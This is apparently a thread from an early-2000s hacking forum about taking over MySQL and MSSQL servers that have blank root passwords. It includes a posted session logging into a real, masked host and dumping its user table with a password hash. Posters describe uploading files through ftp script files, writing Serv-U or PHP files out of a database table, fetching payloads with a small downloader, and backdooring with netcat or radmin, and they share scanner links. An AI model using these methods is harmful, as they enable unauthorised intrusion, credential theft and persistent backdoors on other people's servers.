hello all
it my frist Post on Gouverment Security ...
(Sorry am not good in english am French)
i have a scanner MYsql , i found Admin Mysql axx 66.10*.*.*@mysqlscan#Cracked account: root/[null]
do you have a tutorial to hack this Exploit for put Server FTP ...
or is not possible
thx you ++ all

Hello there
This is my first post on this great board too.
Sorry in advance for my bad english

You can upload files on your Sql server simply creating an ftp putfile by the dos echo command.

A putfile is only a .txt file (it can have any file extension you want) that contains all the commands that ftp.exe must execute.

Example of putfile:

Nice first post evil god!!!

Welcome to GSO both of you.

Very Nice this one is going to be transfered to the nain site.

tnx guyz

Nice, you learnsomething new every day

yes i use this command but you dont have Progz For connect to the MYsql NO mssql

hi
i'm looking for this scanner you mentiond man-FIRE. Could you pleas share it for the community ?

This Scanner IS HScan go to http://www.cnhonker.net/Down/show.php?id=63&down=1


Enjoy MY FRIEND

yer mysql is a lot harder.. i had a tut lol

best is to use it for hacking vbb boards
get the hash files and then use md5crack.exe to get password for users

then log in with admin

but if u want to root 1 its hard. 2 ways i have seen on chinese sites.

1 is build a cmdasp file in the iis www\ which takes like 12 lines of code
u have to do line by line..

But mysql usually use apache not iis...

there is a net user ... \add tut to

but i forgotten it

essentially u build a file in the mysql table....

so not for faint hearted... hacking fxp boards is better lol by looking at hashes

grtz

No problem

anyone have progz To Connect to MYSQL no on MSSQL ????

anyone knows where i could find a document on mysql or something ... ill be glad if someone could guide me a lil ....

i was looking for the exploit doc or something but that was good too .... thanx anywayz

the dude that wanted to get the hashes ....


C:\mysqlscan\tools>mysql.exe -h ***.***.** -uroot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 14 to server version: 3.23.47-nt

Type 'help' for help.

mysql> show databases;
+-----------+
| Database |
+-----------+
| andypics |
| gerlicher |
| infuse |
| mysql |
| robble |
| roster |
| test |
+-----------+
7 rows in set (0.31 sec)

mysql> use mysql;
Reading table information for completion of table and column names

Database changed
mysql> show tables;
+-----------------+
| Tables_in_mysql |
+-----------------+
| columns_priv |
| db |
| func |
| host |
| tables_priv |
| user |
+-----------------+
6 rows in set (0.30 sec)

mysql> select * from user;


+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv
| Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process
_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv |
+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
| localhost | root | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| % | root | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| localhost | | | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
| % | | | N | N | N
| N | N | N | N | N | N
| N | N | N | N | N |
| localhost | mysql | 3c21873862fdc801 | Y | Y | Y
| Y | Y | Y | Y | Y | Y
| Y | Y | Y | Y | Y |
+-----------+-------+------------------+-------------+-------------+------------
-+-------------+-------------+-----------+-------------+---------------+--------
------+-----------+------------+-----------------+------------+------------+
5 rows in set (0.38 sec)

mysql> quit
Bye

Made this tut by myself

gotta do a full 1 sometime, cbf scaning tho

hi its my first reply too ....
i'm looking too for MySQL monitor but i don't find it .. could u help me ?

thx

important question. using sqlexec.exe to get a remote shell on the pc . does that leave any type of log anywhere

hey, there is no tool to connect 2 a mysql like as sql!
anyway, if you can connect, you cant run dos-commands...
i searched about 2 months 4 a way, but no luck...

Hello there you are busted!

If you want a app for connecting to MySQL use EMS MySQL manager (google it). There is shareware ver available, it just allows you to do lots and lots of things on a MySQL DB, but not nearly as good as MSSQL.

to hack mysql u need an exploit but there is no public mysql exploit. If someone has one thats working, this person should contact me i'll give you a lot for it. But I don't think anyone here has one.

eeehm i want to add something 4 the echo script (not for mysql h3h3)

in the script i wouldn't use the binary mode but then type for the execution this command:

ftp -v -n -s:c:\yourfile.txt

Hi does anybody know how to handle special characters in mysql ?

I want to have this in my outfile: (excerpt)

A other way to hack mySQL is U inject U FTP app. (Serv-U, ...) in a new Table
and write it out to a file (like c:\winnt\test.exe)
Then U write a smale PHP file to the server from where U can execute it...

That's the only way I found that works well with mySQL ...

C'^ya
Steven

hmmm....got the commands to use mysql.exe but really not postive what to do....

one of my friends have sucessfully exploited MySQL with exploit that his friend gave him but he don't want to give me the exploit for some reason...

does anyone know to execute a file on a mysql????

I injected Serv-u into a table and wrote it out to a file.

But I don't what I should do. How can I start that File????


thx for your answer

Hello guys,

hm i think u can create a little table and write a php file in this. The output file u can move to www folder (but u must know the directory path). Than go to this file(www.hackeserver.org/phpfile.php) true this the file execute and this let it download (your servu). Ok in the real i have no idea to hack mysql!

funny how MSSQL (microsoft sql) and MySQL are mistaken in this post. these are 2 totally different dbms...

mssql is an old "exploit" where ppl would scan for easy-to-guess user/pass combinations like sa/blank sa/admin etc etc. later scanners were introduced which could scan using dictionaries. then you can connect to the db and use xp_cmdshell to execute shell cmds.

you *COULD* try the same with mysql and code a scanner that would dictionary scan mysql servers. as said before in this thread its not as ez as mssql tho i think i found a document on it on chonker.cn or xforce.net 1/2 yr ago or something. then use the methods discussed in this thread to "upload"/execute files...

an other option is using a exploit. i think there's some (old) public ones available. dunno if they are any good.. try k-otik.com

You can also do what i do which is to pack all your files into 1 .exe and then use a small 800byte webdownloader to dowlnoad your packed exe and then viola everything is setup.

Also its good to use something other than nc.exe which sux there are many mods of nc.exe but i prefer using radmin to backdoor because if used right it never dies

hmm the servu I injected doesn't work

hmm nobody here who knows how it really workz


Or is a mySQL r00t account useless. I don't think so.


Plz tell me how it works

does any1 have antoher useful mysql scanner/bruter than hscan ???

xfind, sqllhf.exe google on it and u got it

mYsql not mssql